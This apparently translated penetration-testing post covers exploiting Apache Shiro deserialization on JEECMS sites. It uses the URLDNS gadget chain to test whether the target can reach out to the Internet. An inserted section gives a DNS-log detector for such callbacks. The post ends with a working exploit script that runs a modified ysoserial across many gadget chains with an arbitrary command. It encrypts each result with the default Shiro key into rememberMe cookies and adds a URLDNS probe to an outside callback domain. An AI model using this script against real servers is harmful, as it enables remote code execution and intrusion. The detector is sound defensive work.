Introduction: During an engagement we ran into JEECMS once again. Even with the key in hand, none of the usual gadget chains gave us echoed output. This post describes a small trick: using the URLDNS chain to confirm that the target can reach out to the Internet.
Reconnaissance: A small JEECMS trick is that install.html reveals the JEECMS version.
Probing with the URLDNS chain: For Shiro, the mature exploit tools that automatically obtain echoed output work less and less often. Because the URLDNS chain is jar-based and unaffected by the target version, when a Shiro site has outbound connectivity you can use the Urldns tool to generate a probe payload for the chain. In practice the steps were as follows:
Note that the generated value is base64-encoded; to verify and exploit Shiro you still need a script that applies AES or GCM encryption. After sending the request from Burp with the cookie field filled in, we learned that the server runs Windows and that the c3p0-92 and cc31 dependencies are present.
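From the defensive side the URLDNS chain leaves a trace: the application server resolves a name the attacker chose. The following added example (not from the original post) runs a small rule set over constructed dnsmasq query-log lines to flag such lookups from the web tier; the web-tier addresses, the allowlist and the `oob-callback.example` zone are assumptions, while `dns.1433.eu.org` is the callback domain used in the writeup above.

```python
import re
from typing import Optional

# Constructed dnsmasq-style query log. Line 2 uses the callback domain from the
# writeup above; every other hostname and address is made up for this example.
SAMPLE_LOG = """\
Jan 12 10:14:01 dnsmasq[1234]: query[A] mirrors.internal.example from 10.0.5.21
Jan 12 10:14:03 dnsmasq[1234]: query[A] test5.351999e7.dns.1433.eu.org from 10.0.5.21
Jan 12 10:14:05 dnsmasq[1234]: query[A] www.example.org from 10.0.9.40
Jan 12 10:14:09 dnsmasq[1234]: query[A] c3p0-92.e9a41f7b3c2d.oob-callback.example from 10.0.5.22
Jan 12 10:14:11 dnsmasq[1234]: query[AAAA] mirrors.internal.example from 10.0.5.22
"""
# Assumed environment facts (constructed): the Java web tier and the zones it may resolve.
WEB_TIER = {"10.0.5.21", "10.0.5.22"}
ALLOWED_SUFFIXES = (".internal.example",)
KNOWN_OOB_SUFFIXES = (".dns.1433.eu.org",)  # OOB zone seen in the writeup

QUERY_RE = re.compile(r"query\[[A-Z]+\] (?P<qname>\S+) from (?P<client>\S+)")
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{8,}$")  # probes often smuggle data as hex labels

def parse_query(line: str) -> Optional[tuple]:
    """Return (qname, client_ip) for a dnsmasq query line, else None."""
    m = QUERY_RE.search(line)
    return (m.group("qname").lower().rstrip("."), m.group("client")) if m else None

def classify(qname: str) -> list:
    """Why a lookup from a web-tier host looks like a URLDNS-style callback ([] = benign)."""
    if qname.endswith(ALLOWED_SUFFIXES):
        return []
    reasons = ["outside allowlist"]
    if qname.endswith(KNOWN_OOB_SUFFIXES):
        reasons.append("known OOB zone")
    if any(HEX_LABEL_RE.match(label) for label in qname.split(".")):
        reasons.append("hex-encoded label")
    return reasons

def detect_callbacks(log_text: str) -> list:
    """Apply the rules to every query issued by a web-tier host."""
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_query(line)
        if parsed is None or parsed[1] not in WEB_TIER:
            continue  # malformed line, or a client outside the web tier
        qname, client = parsed
        reasons = classify(qname)
        if reasons:
            alerts.append({"client": client, "qname": qname, "reasons": reasons})
    return alerts
```

Running `detect_callbacks(SAMPLE_LOG)` yields two alerts, one for each web-tier lookup outside the allowlist, each tagged with the rules it tripped.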
Related exploit script: During verification you can pair this with the modified ysoserial build (ysoserial-for-woodpecker) and write a script that generates payloads in bulk, so that the requests can be sent from Burp for testing.
# pip install pycryptodome
# (the original comment said pycrypto, which is unmaintained; pycryptodome installs
#  the same `Crypto` package this script imports)
import sys
import base64
import uuid
import subprocess
from Crypto.Cipher import AES

# Default Shiro rememberMe key; the JEECMS instance in this writeup still used it.
KEY = "4AvVhmFLUs0KTA3Kprsdag=="
JAR = '.\\ysoserial-for-woodpecker-0.5.1.jar'


def encode_rememberme(command, gadget):
    """Run the modified ysoserial for one gadget and wrap the output as a Shiro
    rememberMe cookie: PKCS#7 padding, AES-CBC with a random IV, IV prepended,
    then base64."""
    popen = subprocess.Popen(['java', '-jar', JAR, '-g', gadget, '-a', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(KEY), AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    return base64.b64encode(iv + encryptor.encrypt(file_body))


def encode_rememberme1():
    """URLDNS probe payload, wrapped the same way, using the callback domain from the writeup."""
    return encode_rememberme('http://test5.351999e7.dns.1433.eu.org', 'URLDNS')


if __name__ == '__main__':
    cmd = sys.argv[1]
    gadgets = ['C3P0', 'C3P0_LowVer', 'CommonsBeanutils1', 'CommonsBeanutils1_183',
               'CommonsBeanutils2', 'CommonsBeanutils2_183', 'CommonsBeanutils3',
               'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3',
               'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6',
               'CommonsCollections7', 'CommonsCollections8', 'CommonsCollections9',
               'CommonsCollections10', 'CommonsCollections11', 'CommonsCollections6Lite',
               'CommonsCollectionsK1', 'CommonsCollectionsK2', 'CommonsCollectionsK3',
               'CommonsCollectionsK4']
    # One cookie line per gadget, appended to payload.cookie for replay from Burp.
    with open("./payload.cookie", "a+") as fpw:
        for gadget in gadgets:
            payload = encode_rememberme(cmd, gadget)
            print("rememberMe={}".format(payload.decode()), file=fpw)
        payload1 = encode_rememberme1()
        print("rememberMe={}".format(payload1.decode()), file=fpw)
The steps above give a closer look at this Shiro trick in JEECMS engagements and at how the URLDNS chain is applied.